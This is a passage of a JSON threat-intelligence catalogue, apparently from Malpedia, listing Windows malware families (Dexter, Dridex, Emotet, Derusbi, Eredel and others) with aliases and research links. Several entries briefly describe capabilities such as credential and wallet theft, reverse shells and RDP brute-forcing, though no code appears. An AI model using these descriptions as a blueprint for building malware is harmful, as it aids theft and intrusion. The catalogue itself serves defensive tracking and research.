"meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.decebal", "https://community.softwaregrp.com/t5/Security-Research/POS-malware-a-look-at-Dexter-and-Decebal/ba-p/272157", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf", "https://www.fireeye.com/blog/threat-research/2014/10/data-theft-in-aisle-9-a-fireeye-look-at-threats-to-retailers.html" ], "synonyms": [], "type": [] }, "uuid": "fba088fb-2659-48c3-921b-12c6791e6d58", "value": "Decebal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltas", "https://www.arbornetworks.com/blog/asert/pivoting-off-hidden-cobra-indicators/" ], "synonyms": [], "type": [] }, "uuid": "0be67307-670d-4558-bcf7-1387047bca4b", "value": "Delta(Alfa,Bravo, ...)" }, { "description": "Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dented" ], "synonyms": [], "type": [] }, "uuid": "0404cb3e-1390-4010-a368-80ee585ddd59", "value": "Dented" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog", "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "synonyms": [], "type": [] }, "uuid": "ff4254e5-f301-4804-9a0f-e010af56576c", "value": "DeputyDog" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deria_lock", "https://twitter.com/struppigel/status/812601286088597505" ], "synonyms": [], "type": [] }, "uuid": "52e0bcba-e352-4d7b-82ee-9169f18dca5a", "value": "DeriaLock" }, { "description": " A DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], "synonyms": [ "PHOTO" ], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", "value": "Derusbi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat" ], "synonyms": [], "type": [] }, "uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631", "value": "Devil's Rat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter", "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html", "https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/", "http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/25000/PD25658/en_US/McAfee_Labs_Threat_Advisory-LusyPOS.pdf", "https://blog.fortinet.com/2014/03/10/how-dexter-steals-credit-card-information", "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/" ], "synonyms": [ "LusyPOS" ], "type": [] }, "uuid": "f44e6d03-54c0-47af-b228-0040299c349c", "value": "Dexter" }, { "description": "According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.\r\n\r\nOnce they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma", "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/", "https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/" ], "synonyms": [ "Arena", "Crysis" ], "type": [] }, "uuid": "9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", "value": "Dharma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", "https://www.scmagazine.com/inside-diamondfox/article/578478/", "https://blog.cylance.com/a-study-in-bots-diamondfox", "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/" ], "synonyms": [ "Crystal", "Gorynch", "Gorynych" ], "type": [] }, "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", "value": "DiamondFox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" ], "synonyms": [], "type": [] }, "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", "value": "Dimnie" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" ], "synonyms": [], "type": [] }, "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs", "https://twitter.com/cyb3rops/status/1101138784933085191" ], "synonyms": [], "type": [] }, "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05", "value": "DispenserXFS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html", "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" ], "synonyms": [], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" ], "synonyms": [], "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, { "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff", "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/" ], "synonyms": [], "type": [] }, "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "DMSniff" }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], "synonyms": [ "TEXTMATE" ], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", "value": "DNSMessenger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", "https://www.us-cert.gov/ncas/alerts/AA19-024A", "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" ], "synonyms": [ "Agent Drable", "Webmask" ], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", "value": "DNSpionage" }, { "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" ], "synonyms": [ "Shelma" ], "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", "https://research.checkpoint.com/dorkbot-an-investigation/", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" ], "synonyms": [], "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", "value": "NgrBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", "value": "DoublePulsar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ "DELPHACY" ], "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", "value": "Downdelph" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", "value": "Downeks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" ], "synonyms": [], "type": [] }, "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://lokalhost.pl/gozi_tree.txt", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" ], "synonyms": [], "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", "value": "DreamBot" }, { "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", "https://viql.github.io/dridex/", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [], "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, { "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" ], "synonyms": [ "Spy.Agent.ORM", "Toshliph" ], "type": [] }, "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", "value": "DRIFTPIN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" ], "synonyms": [], "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", "value": "DROPSHOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" ], "synonyms": [], "type": [] }, "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", "value": "DtBackdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "440daef1-385d-42fd-a714-462590d4ce6b", "value": "DualToy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], "synonyms": [], "type": [] }, "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", "value": "DarkHotel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" ], "synonyms": [], "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", "value": "DUBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" ], "synonyms": [], "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", "value": "Dumador" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Dyreza" ], "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", "value": "EDA2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder", "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf", "https://www.clearskysec.com/iec/" ], "synonyms": [], "type": [] }, "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5", "value": "ElectricPowder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", "value": "Elirks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.joesecurity.org/blog/8409877569366580427" ], "synonyms": [], "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, { "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", "https://attack.mitre.org/software/S0064" ], "synonyms": [ "Elmost" ], "type": [] }, "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834", "value": "ELMER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", "https://github.com/d00rt/emotet_research", "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", "https://www.us-cert.gov/ncas/alerts/TA18-201A", "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", "https://persianov.net/emotet-malware-analysis-part-1", "https://persianov.net/emotet-malware-analysis-part-2", "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://paste.cryptolaemus.com", "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", "https://feodotracker.abuse.ch/?filter=version_e", "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69" ], "synonyms": [ "Geodo", "Heodo" ], "type": [] }, "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", "value": "Emotet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://twitter.com/thor_scanner/status/992036762515050496" ], "synonyms": [], "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", "value": "Empire Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" ], "synonyms": [ "Lurid" ], "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", "value": "Enfal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" ], "synonyms": [], "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", "value": "EquationDrug" }, { "description": "Rough collection EQGRP samples, to be sorted", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", "https://laanwj.github.io/2016/08/22/blatsting.html", "https://laanwj.github.io/2016/09/11/buzzdirection.html", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" ], "synonyms": [], "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", "value": "Equationgroup (Sorting)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" ], "synonyms": [], "type": [] }, "uuid": "06450729-fe60-4348-9717-c13a487738b9", "value": "Erebus (Windows)" }, { "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" ], "synonyms": [], "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", "value": "Eredel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", 